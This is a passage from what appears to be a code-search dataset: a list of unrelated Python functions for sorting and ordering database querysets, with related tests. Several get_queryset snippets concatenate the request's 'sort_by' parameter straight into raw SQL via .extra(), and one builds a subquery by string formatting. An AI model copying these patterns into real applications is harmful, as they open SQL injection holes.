sanitized_field = field.lstrip('-')\n\n extra_select = {\n sanitized_field: '(SELECT %s from %s WHERE item_id=%s.%s)' % \\\n (sanitized_field, db_table, self.model._meta.db_table, pk_name)\n }\n\n # Use original field name when ordering to allow for descending.\n return self.extra(select=extra_select).all().order_by(field)", "def order_queryset(self, queryset):\n if ordering := self.request.query_params.get(\"ordering\"):\n order_by = []\n regex = re.compile(r\"-?annotations__(?P<field_id>\\d+)\")\n fields = [field.strip() for field in ordering.split(\",\")]\n for match in filter(None, map(regex.match, fields)):\n field_id = match.group(\"field_id\")\n annotation_value = AnnotationValue.objects.filter(\n entity_id=OuterRef(\"pk\"), field_id=field_id\n ).values(\"_value__value\")\n annotate = {f\"_order_{field_id}\": Subquery(annotation_value)}\n queryset = queryset.annotate(**annotate)\n sign = \"-\" if match.string.startswith(\"-\") else \"\"\n order_by.append(f\"{sign}_order_{field_id}\")\n if order_by:\n queryset = queryset.order_by(*order_by)\n return queryset", "def order_by(self, *field_names):\n qs = copy(self)\n qs._order_by = field_names\n return qs", "def order_by(self, field_paths, order=None):\n raise NotImplementedError(\"This should have been implemented.\")", "def order_by(self, *fields):\n self.query = self.query.sort(self._parse_order_spec(fields))\n return self", "def sortby(self, sortby):\n self._sortby = sortby", "def sort_queryset(\n queryset: QuerySet, sort_by: SortInputObjectType, reversed: bool\n) -> QuerySet:\n sorting_direction = sort_by.direction\n if reversed:\n sorting_direction = REVERSED_DIRECTION[sorting_direction]\n\n sorting_field = sort_by.field\n sorting_attribute = getattr(sort_by, \"attribute_id\", None)\n\n if sorting_field is not None and sorting_attribute is not None:\n raise GraphQLError(\n \"You must provide either `field` or `attributeId` to sort the products.\"\n )\n elif sorting_attribute is not None: # empty string as sorting_attribute is valid\n return _sort_queryset_by_attribute(\n queryset, sorting_attribute, sorting_direction\n )\n\n sort_enum = sort_by._meta.sort_enum\n sorting_fields = sort_enum.get(sorting_field)\n sorting_field_name = sorting_fields.name.lower()\n\n custom_sort_by = getattr(sort_enum, f\"qs_with_{sorting_field_name}\", None)\n if custom_sort_by:\n queryset = custom_sort_by(queryset)\n\n sorting_field_value = sorting_fields.value\n sorting_list = [f\"{sorting_direction}{field}\" for field in sorting_field_value]\n\n return queryset.order_by(*sorting_list)", "def get_queryset(self):\n qs = super(SortForm, self).get_queryset()\n\n qs = self.pre_sort(qs)\n\n # Ensure that the form is valid\n if not self.is_valid():\n return qs\n\n # Do Sorting\n sorts = self.cleaned_data.get('sort', [])\n order_by = []\n for sort in sorts:\n param = self.HEADERS[abs(sort) - 1]['column']\n if sort < 0:\n param = '-' + param\n order_by.append(param)\n\n if order_by:\n qs = qs.order_by(*order_by)\n\n qs = self.post_sort(qs)\n\n return qs", "def order_by(self, *field_names):\n assert self.query.can_filter(), \\\n \"Cannot reorder a query once a slice has been taken.\"\n\n clone = self._clone()\n for field_name in field_names:\n clone.query.order_by.append(field_name)\n return clone", "def test_ordering_descending_unset(self):\n class F(FilterSet):\n class Meta:\n model = User\n fields = ['username', 'status']\n order_by = True\n\n f = F({'o': '-username'}, queryset=self.qs)\n self.assertQuerysetEqual(\n f.qs, ['jacob', 'carl', 'alex', 'aaron'], lambda o: o.username)", "def order_by(self, value):\r\n # collapse empty values to ()\r\n order_by = () if not value else value\r\n # accept string\r\n order_by = order_by.split(',') if isinstance(order_by, six.string_types) else order_by\r\n valid = []\r\n # everything's been converted to a iterable, accept iterable!\r\n for alias in order_by:\r\n name = OrderBy(alias).bare\r\n if name in self.columns and self.columns[name].orderable:\r\n valid.append(alias)\r\n self._order_by = OrderByTuple(valid)\r\n self.data.order_by(self._order_by)", "def filter_and_order(cls, *args, **kwargs):\n return cls.query.filter_by(**kwargs).order_by(*args)", "def clean_order_by(self):\n\t\tresult = None\n\t\tmap_id = self.cleaned_data.get('order_by', '')\n\t\tif self._ORDER_BY_MAP.has_key(map_id):\n\t\t\tresult = self._ORDER_BY_MAP.get(map_id)\n\t\telse:\n\t\t\tresult = self._ORDER_BY_MAP.values()[0]\n\t\treturn result", "def sort_by(self, sort_direction: epl_imagery_pb2.SortDirection):\n # TODO if you want to sort by multiple parameters, then this class will have to have a pointer to the filter\n if self.metadata_filters.sorted_by:\n self.metadata_filters.sorted_by.query_params.sort_direction = epl_imagery_pb2.NOT_SORTED\n\n self.metadata_filters.sorted_by = self\n\n # class that contains it, and upon updating this class there is a call back to the container class to insert\n # this parameter in a list\n self.query_params.sort_direction = sort_direction\n self.b_initialized = True", "def order_by(self, *fields):\n self._evaluated = False\n if self._order is None:\n self._order = []\n\n for field in fields:\n direction = \"asc\"\n if field.startswith('-'):\n direction = \"desc\"\n field = field[1:]\n\n self._order.append({ field : direction })\n\n return self", "def orderby(cls, field, desc=False):\n cls.runtime.set_orderby((field, desc))\n return cls", "def order_by(self, field_name, direction=ASCENDING):\n\n from jetengine.fields.base_field import BaseField\n from jetengine.fields.list_field import ListField\n\n if isinstance(field_name, (ListField,)):\n raise ValueError(\n \"Can't order by a list field. If you meant to order by the size of the list, please use either an Aggregation Pipeline query (look for Document.objects.aggregate) or create an IntField with the size of the list field in your Document.\"\n )\n\n if isinstance(field_name, (BaseField,)):\n field_name = field_name.name\n\n if field_name not in self.__klass__._fields:\n raise ValueError(\n \"Invalid order by field '%s': Field not found in '%s'.\" % (field_name, self.__klass__.__name__)\n )\n\n field = self.__klass__._fields[field_name]\n self._order_fields.append((field.db_field, direction))\n return self", "def pre_sort(self, qs):\n return qs", "def ordering(self, qs):\n request = self.request\n # Number of columns that are used in sorting\n try:\n i_sorting_cols = int(request.REQUEST.get('iSortingCols', 0))\n except ValueError:\n i_sorting_cols = 0\n\n order = []\n order_columns = self.get_order_columns()\n for i in range(i_sorting_cols):\n # sorting column\n try:\n i_sort_col = int(request.REQUEST.get('iSortCol_%s' % i))\n except ValueError:\n i_sort_col = 0\n # sorting order\n s_sort_dir = request.REQUEST.get('sSortDir_%s' % i)\n\n sdir = '-' if s_sort_dir == 'desc' else ''\n\n sortcol = order_columns[i_sort_col]\n if isinstance(sortcol, list):\n for sc in sortcol:\n order.append('%s%s' % (sdir, sc))\n else:\n order.append('%s%s' % (sdir, sortcol))\n if order:\n return qs.order_by(*order)\n return qs", "def ordering(self):\r\n if hasattr(self, \"queryset\"):\r\n aliases = {}\r\n for bound_column in self.table.columns:\r\n aliases[bound_column.order_by_alias] = bound_column.order_by\r\n try:\r\n return next(segment(self.queryset.query.order_by, aliases))\r\n except StopIteration:\r\n pass", "def order_by(self, field, descending=False):\n self._order_by.append((field, descending))\n return self", "def orderby():\n pass", "def order_by(self, *field_names):\n if self.query.is_sliced:\n raise TypeError(\"Cannot reorder a query once a slice has been taken.\")\n obj = self._chain()\n obj.query.clear_ordering(force=True, clear_default=False)\n obj.query.add_ordering(*field_names)\n return obj", "def get_sort_field(self, kind, order, is_number):\n pass", "def order(self, field, direction=Order.ASC):\n if field == 'id':\n field = '_id'\n\n self._order_by.append((field, direction))\n\n return self", "def sortby(self):\n ...", "def get_sort_by(self):\n\n\t\treturn self.__sort_by", "def get_queryset(self):\n rs = super(BaseQuerysetMixin, self).get_queryset()\n if self.request.GET.get(\"ordering\") is None:\n rs = rs.order_by(\"id\")\n return rs", "def get_sort_by(self) -> SortField:\n if hasattr(self, \"json\") and isinstance(self.json, dict):\n sort_by_str = self.json.get(\"sort_by\", \"relevance\")\n if SortField.is_sort_field(sort_by_str):\n return SortField.from_str(sort_by_str)\n return SortField.relevance", "def __order_queryset(self, queryset):\n if self.get_paginate_by(queryset) and \\\n self.request.method == \"POST\" and self.__has_initially_selected_items():\n current_order_by = list(queryset.query.order_by)\n whenqueries = []\n max_index = 0\n for index, value in enumerate(self.get_selected_values_queryset().order_by(*current_order_by)):\n whenqueries.append(models.When(pk=value.pk, then=models.Value(index)))\n max_index = index\n queryset = queryset.annotate(\n cradmin_multiselect2_ordering=models.Case(\n *whenqueries,\n default=max_index + 1,\n output_field=models.IntegerField()\n )\n )\n order_by = ['cradmin_multiselect2_ordering']\n order_by.extend(current_order_by)\n queryset = queryset.order_by(*order_by)\n return queryset", "def order_by(self, *args):\n order_clauses = self.order_clauses[:]\n related_clauses = self.related_clauses[:]\n model = self.proxy.model\n for arg in args:\n if isinstance(arg, str):\n # Convert django-style to sqlalchemy ordering column\n if arg[0] == '-':\n field = arg[1:]\n ascending = False\n else:\n field = arg\n ascending = True\n\n col = resolve_member_column(model, field, related_clauses)\n\n if ascending:\n clause = col.asc()\n else:\n clause = col.desc()\n else:\n clause = arg\n if clause not in order_clauses:\n order_clauses.append(clause)\n return self.clone(order_clauses=order_clauses,\n related_clauses=related_clauses)", "def order_by(self):\r\n if self.column.order_by is not None:\r\n order_by = self.column.order_by\r\n else:\r\n # default to using column accessor as data source sort key\r\n order_by = OrderByTuple((self.accessor, ))\r\n return order_by.opposite if self.order_by_alias.is_descending else order_by", "def post_sort(self, qs):\n return qs", "def get_queryset(self):\n\n qs = super().get_queryset() # get company specific queryset\n\n filters = dict(self.request.GET.lists()) # dictionary of lists\n\n # pull out order_by and order\n order_by = filters.pop(\"order_by\", None)\n order = filters.pop(\"order\", None)\n\n # Ordering by JSON field taken from\n # https://stackoverflow.com/questions/36641759/django-1-9-jsonfield-order-by\n # Jan 2, 2018\n\n if order_by:\n if order:\n pass\n # TODO: Figure out what can be done for ordering...\n\n else:\n qs = qs.order_by(\"-id\") # default to descending id order\n\n for exp_filter in filters:\n try:\n qs = self.FILTERS[exp_filter](qs, filters[exp_filter])\n except KeyError:\n pass\n # do nothing if not a filter\n\n return qs", "def filter_queryset(self, qs):\n qs = super(ReleaseViewSet, self).filter_queryset(qs)\n if getattr(self, 'order_queryset', False):\n return sorted(qs, key=models.Release.version_sort_key)\n return qs", "def order_queryset_by_sort_order(get, qs):\n\n def get_string_from_tuple_list(lstTuples, number):\n \"\"\"Get the string value corresponding to a number in a list of number-string tuples\"\"\"\n sBack = [tup[1] for tup in lstTuples if tup[0] == number]\n return sBack\n\n # Helper: order a queryset on field [sOrder], which is a number from a list of tuples named [sListName]\n def order_queryset_by_tuple_list(qs, sOrder, sListName):\n \"\"\"Order a queryset on field [sOrder], which is a number from a list of tuples named [sListName]\"\"\"\n\n # Get a list of tuples for this sort-order\n tpList = build_choice_list(sListName)\n # Determine sort order: ascending is default\n bReversed = False\n if (sOrder[0:1] == '-'):\n # A starting '-' sign means: descending order\n sOrder = sOrder[1:]\n bReversed = True\n\n # Order the list of tuples alphabetically\n # (NOTE: they are alphabetical from 'build_choice_list()', except for the values 0,1)\n tpList = sorted(tpList, key=operator.itemgetter(1))\n # Order by the string-values in the tuple list\n return sorted(qs, key=lambda x: get_string_from_tuple_list(tpList, getattr(x, sOrder)), reverse=bReversed)\n\n # Set the default sort order\n sOrder = 'woord' # Default sort order if nothing is specified\n # See if the form contains any sort-order information\n if ('sortOrder' in get and get['sortOrder'] != ''):\n # Take the user-indicated sort order\n sOrder = get['sortOrder']\n\n # The ordering method depends on the kind of field:\n # (1) text fields are ordered straightforwardly\n # (2) fields made from a choice_list need special treatment\n if (sOrder.endswith('handedness')):\n ordered = order_queryset_by_tuple_list(qs, sOrder, \"Handedness\")\n elif (sOrder.endswith('domhndsh') or sOrder.endswith('subhndsh')):\n ordered = order_queryset_by_tuple_list(qs, sOrder, \"Handshape\")\n elif (sOrder.endswith('locprim')):\n ordered = order_queryset_by_tuple_list(qs, sOrder, \"Location\")\n else:\n # Use straightforward ordering on field [sOrder]\n ordered = qs.order_by(sOrder)\n\n # return the ordered list\n return ordered", "def get_queryset(self):\n search_str = self.request.GET.get('search')\n col_nm = self.request.GET.get('sort_by', \"name\")\n self.temp=col_nm\n sort_order = self.request.GET.get('sort_order', \"ASC\")\n self.sort_ordr=sort_order\n\n if search_str:\n search_str = self.request.GET.get('search', None)\n a = Q(name__icontains=search_str)\n b = Q(administrator__first_name__icontains = search_str)\n c = Q(administrator__last_name__icontains = search_str)\n d = Q(administrator__username__icontains = search_str)\n e = Q(types__name__icontains = search_str)\n f = Q(description__icontains = search_str)\n objects = Organization.objects.filter(a | b | c | d | e | f).distinct()\n\n else: # SORTING BY COL_NM\n if col_nm in ['name', 'description'] :\n objects = Organization.objects.filter().extra(\n select = {col_nm:'lower('+col_nm+')'}).order_by(col_nm)\n\n if sort_order == \"DESC\":\n objects = objects.reverse()\n elif col_nm =='administrator__first_name':\n objects=Organization.objects.filter().order_by(col_nm)\n if sort_order == \"DESC\":\n objects = objects.reverse()\n else:\n objects=Organization.objects.extra(select=\n {'name':'lower(name)'}).order_by('name')\n\n\n return objects", "def get_queryset(self, request):\n queryset = self.model._default_manager.all()\n queryset = queryset.filter(user=request.user)\n ordering = self.get_ordering()\n if ordering:\n if isinstance(ordering, str):\n ordering = (ordering,)\n queryset = queryset.order_by(*ordering)\n return queryset", "def test_relatedfieldlistfilter_foreignkey_default_ordering(self):\n\n class BookAdmin(ModelAdmin):\n list_filter = (\"employee\",)\n\n self.addCleanup(setattr, Employee._meta, \"ordering\", Employee._meta.ordering)\n Employee._meta.ordering = (\"name\",)\n modeladmin = BookAdmin(Book, site)\n\n request = self.request_factory.get(\"/\")\n request.user = self.alfred\n changelist = modeladmin.get_changelist_instance(request)\n filterspec = changelist.get_filters(request)[0][0]\n expected = [(self.jack.pk, \"Jack Red\"), (self.john.pk, \"John Blue\")]\n self.assertEqual(filterspec.lookup_choices, expected)", "def test_entities__Entity__setFieldOrder__2(entity_with_field):\n entity = entity_with_field\n entity.setFieldOrder(['dummy2', 'I-do-not-exist', 'dummy'])\n assert ['dummy2', 'dummy'] == entity.getFieldOrder()\n # Unknown field names are not written into storage:\n order_storage = zope.component.getUtility(IOrderStorage)\n assert (['dummy2', 'dummy'] ==\n order_storage.byNamespace(entity.order_storage_namespace))", "def test_entities__Entity__setFieldOrder__1(entity_with_field, field):\n assert [] == entity_with_field.getFieldOrder()\n entity_with_field.setFieldOrder(['dummy2', field.__name__, 'dummy'])\n assert (['dummy2', field.__name__, 'dummy'] ==\n entity_with_field.getFieldOrder())", "def test_relatedonlyfieldlistfilter_foreignkey_default_ordering(self):\n\n class BookAdmin(ModelAdmin):\n list_filter = ((\"employee\", RelatedOnlyFieldListFilter),)\n\n albert = Employee.objects.create(name=\"Albert Green\", department=self.dev)\n self.djangonaut_book.employee = albert\n self.djangonaut_book.save()\n self.bio_book.employee = self.jack\n self.bio_book.save()\n\n self.addCleanup(setattr, Employee._meta, \"ordering\", Employee._meta.ordering)\n Employee._meta.ordering = (\"name\",)\n modeladmin = BookAdmin(Book, site)\n\n request = self.request_factory.get(\"/\")\n request.user = self.alfred\n changelist = modeladmin.get_changelist_instance(request)\n filterspec = changelist.get_filters(request)[0][0]\n expected = [(albert.pk, \"Albert Green\"), (self.jack.pk, \"Jack Red\")]\n self.assertEqual(filterspec.lookup_choices, expected)", "def _get_order_by(order, orderby, order_by_fields):\n try:\n # Find the actual database fieldnames for the keyword.\n db_fieldnames = order_by_fields[orderby]\n except KeyError:\n raise ValueError(\n \"Invalid value for 'orderby': '{}', supported values are: {}\".format(\n orderby, \", \".join(sorted(order_by_fields.keys()))\n )\n )\n\n # Default to descending for some fields, otherwise be ascending\n is_desc = (not order and orderby in ORDER_BY_DESC) or (order or \"asc\").lower() in (\n \"desc\",\n \"descending\",\n )\n\n if is_desc:\n return map(lambda name: \"-\" + name, db_fieldnames)\n else:\n return db_fieldnames", "def get_ordering(self, request, queryset, view):\n ordering = []\n params = get_datatables_ordering(request.query_params)\n if params:\n fields = [param.strip() for param in params.split(',')]\n ordering = self.remove_invalid_fields(queryset, fields, view, request)\n if ordering:\n return ordering\n\n # No ordering was included, or all the ordering fields were invalid\n return self.get_default_ordering(view)", "def set_sorting_enabled(self, value):\n self.tableWidget.setSortingEnabled(value)", "def sort(self, column, order=Qt.AscendingOrder):\n if(column == Columns.Date):\n self.sorting = Sorting.Date\n elif(column == Columns.Code):\n self.sorting = Sorting.Code\n elif(column == Columns.User):\n self.sorting = Sorting.User\n elif(column == Columns.Tags):\n self.sorting = Sorting.Priviledges\n elif(column == Columns.TimesRequested):\n self.sorting = Sorting.TimesRequested\n\n if(order == Qt.DescendingOrder):\n self.sorting |= Sorting.Reversed\n\n self._reset_view()", "def _apply_order_by_and_limit(objects, order_by=None, limit=None):\n if order_by:\n try:\n # Note: currently we sort only by the first column from the list\n order_by = order_by[0]\n order_field = order_by[\"name\"]\n order_desc = order_by.get(\"desc\", False)\n objects = sorted(\n objects,\n key=lambda obj: getattr(obj, order_field),\n reverse=order_desc,\n )\n except:\n raise BadQueryException(\"Bad query: Invalid 'order_by' parameter\")\n\n if limit:\n try:\n from_, to_ = limit\n objects = objects[from_: to_]\n except:\n raise BadQueryException(\"Bad query: Invalid 'limit' parameter.\")\n\n return objects", "def test_entities__Entity__getFieldOrder__2(entity_with_field, field):\n entity = entity_with_field\n entity.setFieldOrder([field.__name__, 'dummy'])\n assert [field.__name__, 'dummy'] == entity.getFieldOrder()", "def test_order_by(self):\n self.Person(name=\"User B\", age=40).save()\n self.Person(name=\"User A\", age=20).save()\n self.Person(name=\"User C\", age=30).save()\n\n names = [p.name for p in self.Person.objects.order_by(\"-age\")]\n assert names == [\"User B\", \"User C\", \"User A\"]\n\n names = [p.name for p in self.Person.objects.order_by(\"+age\")]\n assert names == [\"User A\", \"User C\", \"User B\"]\n\n names = [p.name for p in self.Person.objects.order_by(\"age\")]\n assert names == [\"User A\", \"User C\", \"User B\"]\n\n ages = [p.age for p in self.Person.objects.order_by(\"-name\")]\n assert ages == [30, 40, 20]\n\n ages = [p.age for p in self.Person.objects.order_by()]\n assert ages == [40, 20, 30]\n\n ages = [p.age for p in self.Person.objects.order_by(\"\")]\n assert ages == [40, 20, 30]", "def queryset(self, ordering=None):\r\n qs = self.model._default_manager.get_query_set()\r\n if not ordering:\r\n ordering = self.ordering or () # otherwise we might try to *None, which is bad ;)\r\n if ordering:\r\n qs = qs.order_by(*ordering)\r\n return qs", "def sort(self, *order_fields):\n return MockSearch(\n self, self._query, self.nested_filter_calls, order_fields,\n self._script_fields\n )", "def order_by(self, aliases):\r\n accessors = []\r\n for alias in aliases:\r\n bound_column = self.table.columns[OrderBy(alias).bare]\r\n # bound_column.order_by reflects the current ordering applied to\r\n # the table. As such we need to check the current ordering on the\r\n # column and use the opposite if it doesn't match the alias prefix.\r\n if alias[0] != bound_column.order_by_alias[0]:\r\n accessors += bound_column.order_by.opposite\r\n else:\r\n accessors += bound_column.order_by\r\n if hasattr(self, \"queryset\"):\r\n translate = lambda accessor: accessor.replace(Accessor.SEPARATOR, QUERYSET_ACCESSOR_SEPARATOR)\r\n self.queryset = self.queryset.order_by(*(translate(a) for a in accessors))\r\n else:\r\n self.list.sort(key=OrderByTuple(accessors).key)", "def get_queryset(self):\n\n search_str = self.request.GET.get('search', None)\n col_nm = self.request.GET.get('sort_by', \"name\")\n self.temp=col_nm\n sort_order = self.request.GET.get('sort_order', \"ASC\")\n self.sort_ordr=sort_order\n if search_str:\n a = Q(name__icontains = search_str)\n b = Q(description__icontains = search_str)\n objects = self.model.objects.filter(a | b).distinct()\n\n else:\n objects = OrganizationType.objects.filter().extra(\n select = {col_nm:'lower('+col_nm+')'}).order_by(col_nm)\n\n if sort_order == \"DESC\":\n objects = objects.reverse()\n return objects", "def sortby(self):\n return self._sortby", "def order_query(self, query):\n\n direction = desc if self.direction == 'desc' else asc\n if self.order in inspect(self.model_class).columns.keys():\n attribute = getattr(self.model_class, self.order)\n elif self.order == 'group.name':\n attribute = func.coalesce(UserGroup.name, '')\n elif self.order == 'user.realname':\n attribute = func.coalesce(User.realname, '')\n elif self.order == 'user.username':\n attribute = func.coalesce(User.username, '')\n elif self.order == 'user.name':\n attribute = func.coalesce(User.realname, User.username, '')\n else:\n attribute = self.model_class.first_issue\n\n return query.order_by(None).order_by(direction(attribute))", "def _sort_by_query_string_param(self, songs):\n orderable_fields_dict = {\n 'name': Lower('name'),\n 'artist': Lower('artist__name'),\n 'avgRating': 'average_rating',\n 'year': 'year'\n }\n\n order_by = self.request.query_params.get('orderBy', None)\n\n if order_by is not None and order_by in orderable_fields_dict:\n order_field = orderable_fields_dict[order_by]\n\n # sort in direction indicated by `direction` query string param\n # or ascending, by default\n direction = self.request.query_params.get('direction', 'asc')\n if direction == 'desc':\n if order_by == 'name' or order_by == 'artist':\n order_field = order_field.desc()\n else:\n order_field = '-' + order_field\n\n # add annotation for average_rating to sort by computed property\n if order_by == 'avgRating':\n songs = songs.annotate(\n average_rating=Avg('ratings__rating')\n )\n\n songs = songs.order_by(order_field)\n\n return songs", "def sort_from_request(request):\n order = request.args.get('order_by')\n if order:\n key, direction = order.split(',')\n reverse = False if direction == 'ASC' else True\n return Sort(key, reverse)\n else:\n return Sort(None)", "def validate_sort_order(filter, main_field):\n\n # The tiebreaker fields are always in the same order, but\n # if the main sort field is one of the tiebreaker fields,\n # it's removed from the list -- there's no need to sort on\n # that field a second time.\n default_sort_fields = [\n {x: \"asc\"} for x in ['sort_author', 'sort_title', 'work_id']\n if x != main_field\n ]\n assert default_sort_fields == filter.sort_order[1:]\n return filter.sort_order[0]", "def test_relatedfieldlistfilter_foreignkey_ordering(self):\n\n class EmployeeAdminWithOrdering(ModelAdmin):\n ordering = (\"name\",)\n\n class BookAdmin(ModelAdmin):\n list_filter = (\"employee\",)\n\n site.register(Employee, EmployeeAdminWithOrdering)\n self.addCleanup(lambda: site.unregister(Employee))\n modeladmin = BookAdmin(Book, site)\n\n request = self.request_factory.get(\"/\")\n request.user = self.alfred\n changelist = modeladmin.get_changelist_instance(request)\n filterspec = changelist.get_filters(request)[0][0]\n expected = [(self.jack.pk, \"Jack Red\"), (self.john.pk, \"John Blue\")]\n self.assertEqual(filterspec.lookup_choices, expected)", "def _orderby_expression(self):\n return ''", "def order_by(cls, *args):\n return cls.query.order_by(*args)", "def order_by(self, column, direction=\"ASC\"):\n self._order_by += ((column, direction),)\n return self", "def add_sort(self, field_name, ascending=True):\n if not self._query_is_empty():\n self.query.AND()\n if ascending:\n logger.info(\"Sorting records by {} in ascending order.\".format(field_name))\n self.query.field(field_name.lower()).order_ascending() # lowercase for convenience\n logger.debug(\"sysparm_query contains: {q}\".format(q=self.query._query))\n else:\n logger.info(\"Sorting records by {} in descending order.\".format(field_name))\n self.query.field(field_name.lower()).order_descending()\n logger.debug(\"sysparm_query contains: {q}\".format(q=self.query._query))", "def get_query_set(model_class, sort_column=\"id\", sort_descending=True, filters={}): \n sort_modifier = \"\"\n if sort_descending:\n sort_modifier = \"-\"\n return model_class.objects.filter(**filters).order_by(\"%s%s\"% (sort_modifier, sort_column))", "def test_relatedonlyfieldlistfilter_foreignkey_ordering(self):\n\n class EmployeeAdminWithOrdering(ModelAdmin):\n ordering = (\"name\",)\n\n class BookAdmin(ModelAdmin):\n list_filter = ((\"employee\", RelatedOnlyFieldListFilter),)\n\n albert = Employee.objects.create(name=\"Albert Green\", department=self.dev)\n self.djangonaut_book.employee = albert\n self.djangonaut_book.save()\n self.bio_book.employee = self.jack\n self.bio_book.save()\n\n site.register(Employee, EmployeeAdminWithOrdering)\n self.addCleanup(lambda: site.unregister(Employee))\n modeladmin = BookAdmin(Book, site)\n\n request = self.request_factory.get(\"/\")\n request.user = self.alfred\n changelist = modeladmin.get_changelist_instance(request)\n filterspec = changelist.get_filters(request)[0][0]\n expected = [(albert.pk, \"Albert Green\"), (self.jack.pk, \"Jack Red\")]\n self.assertEqual(filterspec.lookup_choices, expected)", "def on_combo_sort_col_names_currentIndexChanged(self, index):\n if self.ui.sort_radio_asc.isChecked():\n self.model.setSort(index, Qt.AscendingOrder)\n else:\n self.model.setSort(index, Qt.DescendingOrder)\n self.model.select()", "def order_by_alias(self):\r\n order_by = OrderBy((self.table.order_by or {}).get(self.name, self.name))\r\n order_by.next = order_by.opposite if self.is_ordered else order_by\r\n return order_by", "def update_order_property_setter(self, has_custom, fieldname):\n\t\tproperty_name = f\"{fieldname}_order\"\n\t\tif has_custom:\n\t\t\t# save the order of the actions and links\n\t\t\tself.make_property_setter(\n\t\t\t\tproperty_name, json.dumps([d.name for d in self.get(fieldname)]), \"Small Text\"\n\t\t\t)\n\t\telse:\n\t\t\tfrappe.db.delete(\"Property Setter\", dict(property=property_name, doc_type=self.doc_type))", "def set_sort_order(self, sort_order):\n\n\t\tif sort_order is not None and not isinstance(sort_order, str):\n\t\t\traise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: sort_order EXPECTED TYPE: str', None, None)\n\t\t\n\t\tself.__sort_order = sort_order\n\t\tself.__key_modified['sort_order'] = 1", "def changeOrder(self):\n order = self.orderSpinBox.value()\n nfilter = int(str(self.filterComboBox.currentText()))\n if order > nfilter - 2:\n order = nfilter - 2\n if order < 1:\n order = 1\n self.orderSpinBox.setValue(order)\n self.order = order", "def order_by(self, *colnames):\r\n if len(colnames) == 0:\r\n clone = copy.deepcopy(self)\r\n clone._order = []\r\n return clone\r\n\r\n conditions = []\r\n for colname in colnames:\r\n conditions.append('\"{}\" {}'.format(*self._get_ordering_condition(colname)))\r\n\r\n clone = copy.deepcopy(self)\r\n clone._order.extend(conditions)\r\n return clone", "def resolve_orderby(self, orderby: Optional[Union[List[str], str]]) -> List[OrderBy]:\n validated: List[OrderBy] = []\n\n if orderby is None:\n return validated\n\n if isinstance(orderby, str):\n if not orderby:\n return validated\n\n orderby = [orderby]\n\n orderby_columns: List[str] = orderby if orderby else []\n\n resolved_orderby: Union[str, SelectType, None]\n for orderby in orderby_columns:\n bare_orderby = orderby.lstrip(\"-\")\n bare_orderby = self.tag_to_prefixed_map.get(bare_orderby, bare_orderby)\n try:\n # Allow ordering equations with the calculated alias (ie. equation[0])\n if is_equation_alias(bare_orderby):\n resolved_orderby = bare_orderby\n # Allow ordering equations directly with the raw alias (ie. equation|a + b)\n elif is_equation(bare_orderby):\n resolved_orderby = self.equation_alias_map[strip_equation(bare_orderby)]\n bare_orderby = resolved_orderby.alias\n else:\n resolved_orderby = self.resolve_column(bare_orderby)\n except (NotImplementedError, IncompatibleMetricsQuery):\n resolved_orderby = None\n\n direction = Direction.DESC if orderby.startswith(\"-\") else Direction.ASC\n\n if fields.is_function(bare_orderby) and (\n isinstance(resolved_orderby, Function)\n or isinstance(resolved_orderby, CurriedFunction)\n or isinstance(resolved_orderby, AliasedExpression)\n ):\n bare_orderby = resolved_orderby.alias\n\n for selected_column in self.columns:\n if isinstance(selected_column, Column) and selected_column == resolved_orderby:\n validated.append(OrderBy(selected_column, direction))\n break\n elif (\n isinstance(selected_column, AliasedExpression)\n and selected_column.alias == bare_orderby\n ):\n if bare_orderby in self.orderby_converter:\n validated.append(self.orderby_converter[bare_orderby](direction))\n break\n # We cannot directly order by an `AliasedExpression`.\n # Instead, we order by the column inside.\n validated.append(OrderBy(selected_column.exp, direction))\n break\n\n elif (\n isinstance(selected_column, CurriedFunction)\n and selected_column.alias == bare_orderby\n ):\n if bare_orderby in self.orderby_converter:\n validated.append(self.orderby_converter[bare_orderby](direction))\n validated.append(OrderBy(selected_column, direction))\n break\n\n if len(validated) == len(orderby_columns):\n return validated\n\n # TODO: This is no longer true, can order by fields that aren't selected, keeping\n # for now so we're consistent with the existing functionality\n raise InvalidSearchQuery(\"Cannot sort by a field that is not selected.\")", "def get_paginate_by(self, queryset):\n return self.request.GET.get('paginate_by', self.paginate_by)", "def get_queryset(self):\n search_str = self.request.GET.get('search', None)\n col_nm = self.request.GET.get('sort_by', 'title')\n self.temp=col_nm\n sort_order = self.request.GET.get('sort_order', 'ASC')\n self.sort_ordr=sort_order\n if search_str:\n search_str = self.request.GET.get('search', None)\n a = Q(title__icontains = search_str)\n b = Q(description__icontains = search_str)\n objects = Designation.objects.filter(a | b).distinct()\n else: # SORTING BY COL_NM\n objects = Designation.objects.filter().extra(\n select = {col_nm:'lower('+col_nm+')'}).order_by(col_nm)\n\n if sort_order == \"DESC\":\n objects = objects.reverse()\n return objects", "def get_default_paginate_by(self, queryset):\n return self.paginate_by", "def get_queryset(self):\n queryset = super(viewsets.ModelViewSet, self).get_queryset().order_by('first_name')\n\n if self.request.GET.get('q', None):\n return queryset.filter(username__icontains=self.request.GET['q'])\n return queryset", "def __init__(\n self,\n queryset,\n per_page=25,\n ordering=\"pk\",\n allow_count=False,\n allow_empty_first_page=True,\n orphans=0,\n ):\n self.queryset = queryset\n self.per_page = int(per_page)\n self.ordering = ordering\n self.allow_count = allow_count\n\n field = ordering.replace(\"-\", \"\")\n self._reverse_ordering = field if ordering[0] == \"-\" else \"-{0}\".format(ordering)\n self._field = field", "def sort_field():\n _id = request.form['_id']\n old_index = request.form['old_index']\n new_index = request.form['new_index']\n data, code, message = FIELD_SERVICE.sort_field(_id, old_index, new_index)\n return __result(data, code, message)", "def sort(self, field='word', order=None):\n self.data = list(self.sorted(field, order))", "def order_by(self, *orderings):\n return OrderedQuery(self, orderings)", "def ordered(self):\n if isinstance(self, EmptyQuerySet):\n return True\n if self.query.extra_order_by or self.query.order_by:\n return True\n elif (\n self.query.default_ordering\n and self.query.get_meta().ordering\n and\n # A default ordering doesn't affect GROUP BY queries.\n not self.query.group_by\n ):\n return True\n else:\n return False", "def order_by(self, *fields):\n doc = []\n for field in fields:\n if field.startswith('-'):\n doc.append((field.strip('-'), pymongo.DESCENDING))\n else:\n doc.append((field, pymongo.ASCENDING))\n return self.sort(doc)", "def pre_filter(self, qs):\n return qs", "def test_shelflistitem_view_orderby(order_by, api_settings, shelflist_solr_env,\n get_shelflist_urls, api_client):\n sl_urls = get_shelflist_urls(shelflist_solr_env.records['shelflistitem'])\n test_url = '{}?orderBy={}'.format(sl_urls.values()[0], order_by)\n response = api_client.get(test_url)\n assert response.status_code == 400\n assert 'not a valid field for ordering' in 